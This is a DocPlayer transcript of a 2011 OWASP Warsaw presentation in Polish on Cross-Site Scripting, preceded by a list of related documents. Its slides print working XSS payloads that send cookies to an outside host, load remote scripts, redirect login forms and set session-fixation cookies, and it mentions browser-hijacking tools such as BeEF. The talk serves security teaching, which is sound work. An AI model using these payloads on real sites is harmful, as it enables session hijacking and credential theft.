OWASP OWASP. The OWASP Foundation http://www.owasp.org. Cross-Site Scripting. Ryzyko do zaakceptowania? Warszawa, 27 stycznia 2011 Michał Kurek

Podobne dokumenty
Zagrożenia związane z udostępnianiem aplikacji w sieci Internet

Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework

Wprowadzenie do kryptografii i bezpieczeństwa. Po raz czwarty

Narzędzia OWASP dla developerów OWASP ESAPI & AppSensor OWASP The OWASP Foundation

The OWASP Foundation Session Management. Sławomir Rozbicki.

Jak efektywnie wykrywać podatności bezpieczeństwa w aplikacjach? OWASP The OWASP Foundation

Drobne błędy w portalach WWW

Ataki na aplikacje WWW. Łomem, czy wytrychem? Jak dobrać się do aplikacji WWW

Hosting WWW Bezpieczeństwo hostingu WWW. Dr Michał Tanaś (

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8.

Zagrożenia trywialne. Zagrożenia bezpieczeństwa aplikacji internetowych. Parametry ukryte. Modyfikowanie parametrów wywołania

Analiza skuteczności zabezpieczeń przed atakami na aplikacje Web

Network Forensic Co mówią złapane pakiety?

OWASP. The Open Web Application Security Project. OWASP Top rc1. Dziesięć najbardziej krytycznych zagrożeń w web aplikacjach

POLITYKA PRYWATNOŚCI ORAZ POLITYKA PLIKÓW COOKIES W Sowa finanse

Zarządzanie sesją w aplikacjach Internetowych. Kraków, Paweł Goleń

Fuzzing OWASP The OWASP Foundation Piotr Łaskawiec J2EE Developer/Pentester

KARTA PRZEDMIOTU. Programowanie aplikacji internetowych

Cookie Policy. 1. Informacje ogólne.

Cemarol Sp. z o.o. Polityka prywatności (pliki cookies) 1. Informacje ogólne.

Obsługa incydentów bezpieczeństwa: część I, z punktu widzenia menadżera. OWASP The OWASP Foundation

Open(Source) Web Application Security Project

Ataki socjotechniczne prawda czy fikcja? Jak się przed nimi bronić?

Aspekty bezpieczeństwa aplikacji internetowych

Polityka prywatności serwisu

Serwis realizuje funkcje pozyskiwania informacji o użytkownikach i ich zachowaniach w następujący sposób:

PLAN WYNIKOWY PROGRAMOWANIE APLIKACJI INTERNETOWYCH. KL IV TI 6 godziny tygodniowo (6x15 tygodni =90 godzin ),

Tytuł prezentacji. Wykrywanie cyberzagrożeń typu Drive-by Download WIEDZA I TECHNOLOGIA. Piotr Bisialski Security and Data Center Product Manager

Agenda. Rys historyczny Mobilne systemy operacyjne

POLITYKA PRYWATNOŚCI

OWASP OWASP. The OWASP Foundation Mariusz Burdach Prevenity

Szczegółowy opis zamówienia:

Projektowani Systemów Inf.

Przegląd technik wirtualizacji i separacji w nowoczesnych systemach rodziny UNIX

Bezpieczeństwo aplikacji Czy musi być aż tak źle? OWASP The OWASP Foundation

POLITYKA PRYWATNOŚCI SERWIS:

KORZYSTANIE Z BAZY DANYCH UpToDate

Opis Przedmiotu Zamówienia na przeprowadzenie testów bezpieczeństwa systemu wspomagania nadzoru archiwalnego e-nadzór

Czy ochrona sieci jest nadal wyzwaniem, czy tylko jednorazową usługą?

POLITYKA PRYWATNOŚCI

ZASADY KORZYSTANIA Z PLIKÓW COOKIES ORAZ POLITYKA PRYWATNOŚCI W SERWISIE INTERNETOWYM PawłowskiSPORT.pl

Przegląd technik wirtualizacji i separacji w nowoczesnych systemach rodziny UNIX

ActiveXperts SMS Messaging Server

Projektowanie bezpieczeństwa sieci i serwerów

1. Gromadzenie danych osobowych i sposób ich wykorzystania

Bezpieczeństwo aplikacji internetowych

KONFIGURACJA PRZEGLĄDAREK. Poniższa konfiguracja dedykowana jest dla Bankowości Internetowej SGB

Polityka Prywatności i Cookies

Webapplication Security Pentest Service

4383: Tyle podatności wykryto w 2010 r. Przed iloma jesteś chroniony? 2010 IBM Corporation

Tworzenie witryn internetowych PHP/Java. (mgr inż. Marek Downar)

Asix.Evo - Uruchomienie aplikacji WWW

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne

Webowy generator wykresów wykorzystujący program gnuplot

Polityka Prywatności

PRZEWODNIK PO PRZEDMIOCIE

PLAN WYNIKOWY PROGRAMOWANIE APLIKACJI INTERNETOWYCH. KL III TI 4 godziny tygodniowo (4x30 tygodni =120 godzin ),

Full Stack JavaScript z Angular i Nest. Dni: 5. Opis: Adresaci szkolenia

Polityka prywatności 1. Informacje ogólne.

Bezpieczeństwo systemów komputerowych. Java i JavaScript. Java i JavaScript. Java - historia

Instrukcja konfiguracji funkcji skanowania

TCP/IP. Warstwa aplikacji. mgr inż. Krzysztof Szałajko

Urządzenia mobilne Nowe szanse, nowe zagrożenia FWZQJAEHEPQABIRQS

tel.: (+48) mail.

Zmienne i stałe w PHP

Kontrola sesji w PHP HTTP jest protokołem bezstanowym (ang. stateless) nie utrzymuje stanu między dwoma transakcjami. Kontrola sesji służy do

Marek Krauze

Przewodnik po Notowaniach Statica mdm 4

Wykrywanie i odpieranie ataków socjotechnicznych oraz cybernetycznych - jak zaatakować napastnika? Grzegorz Wróbel

I. Informacje ogólne. Jednym z takich systemów jest Mambo.

Sprawozdanie Laboratorium 4

Nowoczesne projektowanie aplikacji intrnetowych - opis przedmiotu

ATAKI TYPU CROSS-SITE SCRIPTING

Grzegorz Ruciński. Warszawska Wyższa Szkoła Informatyki Promotor dr inż. Paweł Figat

Regulaminu korzystania z serwisów internetowych i polityka prywatności

Aplikacje WWW. Wykład 13. Zagrożenia bezpieczeństwa aplikacji WWW. wykład prowadzi: Maciej Zakrzewicz. Zagrożenia bezpieczeństwa

Sprawozdanie Sieci komputerowe i bazy danych Laboratorium nr 4

Czym są pliki cookies?

plansoft.org Zmiany w Plansoft.org Błyskawiczny eksport danych PLANOWANIE ZAJĘĆ, REZERWOWANIE SAL I ZASOBÓW

OWASP i Top 10 Sposób tworzenia Top 10 Czym jest a czym NIE jest Top 10? Zmiany w wersji 2013 Omówienie nowych podatności na liście Podsumowanie

Architektura bezpiecznych aplikacji internetowych na platformie Java Enterprise Edition. Jakub Grabowski Warszawa,

Bezpieczeństwo systemów komputerowych

Tworzenie, zaciemnianie i analiza złośliwego kodu JavaScript. OWASP Czerwiec The OWASP Foundation

Plan. Wprowadzenie. Co to jest APEX? Wprowadzenie. Administracja obszarem roboczym

Bezpieczeństwo aplikacji webowych - standardy, przewodniki i narzędzia OWASP OWASP The OWASP Foundation

HTML, CSS i JavaScript / Laura Lemay, Rafe Colburn, Jennifer Kyrnin. Gliwice, cop Spis treści

POLITYKA PRYWATNOŚCI W SERWISIE INTERNETOWYM

BIBLIOTEKA CYFROWA JAKO KONTENER TREŚCI DLA PORTALI INTERNETOWYCH. DLIBRA & DRUPAL DWA SYSTEMY, JEDNA WITRYNA.

Laboratorium - Konfiguracja ustawień przeglądarki w Windows Vista

II. PRZETWARZANIE DANYCH OSOBOWYCH:

E-commerce. Genialnie proste tworzenie serwisów w PHP i MySQL.

Instrukcja instalacji połączenia sterownika PL11-MUT24 ze stroną internetową.

RAPORT SKANOWANIA ANTY-EXPLOITOWEGO kont hostingowych Smarthost.pl za rok 2016

Stosowanie ciasteczek (cookies)

Zakres treści Czas. 2 Określenie charakteru i tematyki strony. Rodzaje witryn. Projekt graficzny witryny. Opracowanie skryptów

Certyfikat. 1 Jak zbieramy dane?

Zaawansowane aplikacje internetowe

PRZEWODNIK PO SERWISIE BRe BROKERS Rozdział 6

Transkrypt:

Cross-Site Scripting Ryzyko do zaakceptowania? Warszawa, 27 stycznia 2011 Michał Kurek Copyright The Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the License. The Foundation http://www.owasp.org

Plan prezentacji Omówienie podatności Cross-Site Scripting (XSS) Metody identyfikacji XSS Podstawowe metody wykorzystania XSS Zaawansowane metody wykorzystania XSS 2

Omówienie podatności Cross-site Scripting Charakterystyka ataku Cross-site Scripting (XSS) jest atakiem, którego celem jest nie aplikacja, ale jej użytkownicy Atak polegający na umieszczeniu w treści strony internetowej aplikacji nieautoryzowanego kodu, wykonywanego przez przeglądarkę po stronie użytkownika Atak wykorzystuje relację zaufania przeglądarki do aplikacji Główne rodzaje podatności XSS: nietrwałe XSS (non-persistent / reflected XSS) trwałe XSS (persistent / stored XSS) DOM based XSS http://adres.pl/artykul.php?tytul="> </script>alert(document.cookie) </script> 3

Omówienie podatności Cross-site Scripting Problematyka ochrony przed atakami XSS Źródłem podatności jest brak odpowiedniej walidacji danych wprowadzanych przez użytkowników Bardzo ważna jest ochrona aplikacji przed podatnościami XSS, ponieważ użytkownik ma bardzo małe możliwości ochrony przed tymi atakami Wyłączenie w przeglądarce obsługi JavaScript (kod najczęściej wykorzystywany w atakach XSS) utrudni korzystanie z serwisów internetowych Atak typu persistent XSS jest praktycznie niezauważalny przez użytkownika Atak typu reflected XSS wymaga nakłonienia użytkownika do załadowania podesłanego URL metodami inżynierii społecznej podczas załadowania niezaufanej strony internetowej atak nie jest ograniczony tylko do metod GET Przeglądając niezaufane serwisy internetowe narażeni jesteśmy na ataki XSS oraz uruchomienie złośliwego kodu 4

Metody identyfikacji XSS Wysłanie danych zawierających najprostszy kod najczęściej JavaScript <SCRIPT>alert( XSS );</SCRIPT> Niektóre serwisy są częściowo chronione przed prostymi atakami XSS: filtry typu black list filtry typu white list W celu ominięcia tych filtrów można stosować wiele technik wymienionych w RSnake s XSS Cheat Sheet (http://ha.ckers.org/xss.html) Jeśli ilość znaków jest ograniczeniem, można pobrać zdalny skrypt z serwera atakującego: <SCRIPT SRC=http://ey.pl/a.js></SCRIPT> Podatność Cross-Site Scripting jest łatwa do identyfikacji przy użyciu narzędzi automatycznych 5

Podstawowe metody wykorzystania XSS Odczytanie zawartości pliku cookie: Kluczowy atak prowadzący do przejęcia sesji innego użytkownika <SCRIPT>document.write( <IMG SRC="http://ey.pl/'+document.cookie+'"> )</SCRIPT> Przekierowanie użytkowników: Proste przekierowanie: <SCRIPT language="javascript">window.location.href = "http://ey.pl/inna.html" ;</SCRIPT> Przekierowanie wyników formularza (np. formularza logowowania do aplikacji): document.forms[1].action="http://www.ey.pl/" Podmiana zawartości wyświetlanej strony Zapisywanie zawartości pliku cookie: Element ataku Session Fixation document.cookie = "sessionid=1234567890;expires=sun, 27-Feb-2011;path=/"; 6

Zaawansowane metody wykorzystania XSS Istnieje możliwość uruchamiania dowolnego kodu akceptowanego przez przeglądarkę ofiary JavaScript jest rozbudowanym językiem programowania, którego możliwości wykorzystania limitowane są wyłącznie kreatywnością atakującego Atak może prowadzić do przejęcia kontroli nad przeglądarką ofiary Zaawansowane ataki mogą wykorzystywać fakt, że komputer w sieci wewnętrznej ofiary znajduje się w bardziej zaufanej strefie bezpieczeństwa: nieautoryzowany dostęp do aplikacji intranetowych ominięcie filtrowania opartego na adresach IP brak konieczności uwierzytelniania w przypadku rozwiązań Single Sign-On W Internecie znajdują się gotowe pakiety oprogramowania do przejmowania przeglądarek z wykorzystaniem XSS: XSS Proxy AttackAPI BeEF (Browser Exploitation Framework) Powstają również platformy do tworzenia własnych exploit ów XSS: durzosploit 7

Zaawansowane metody wykorzystania XSS BeEF Browser Exploitation Framework stworzony przez Wade Alcorn, do pobrania z http://www.bindshell.net Interfejs do zarządzania zombie PHP, kod w przeglądarce JavaScript Dostępne moduły: Clipboard Stealing JavaScript Injection Request Initiation History Browsing Port Scanning Browser Exploits Inter-Protocol Exploitation Źródło: http://www.bindshell.net 8

Pytania? Michał Kurek Manager, Ernst & Young e-mail: michal.kurek@pl.ey.com Tel.: +48 22 557 8715 Fax: +48 22 557 7001 9

2025 © DocPlayer.pl Polityka prywatności | Warunki świadczenia usług | Zwrotny adres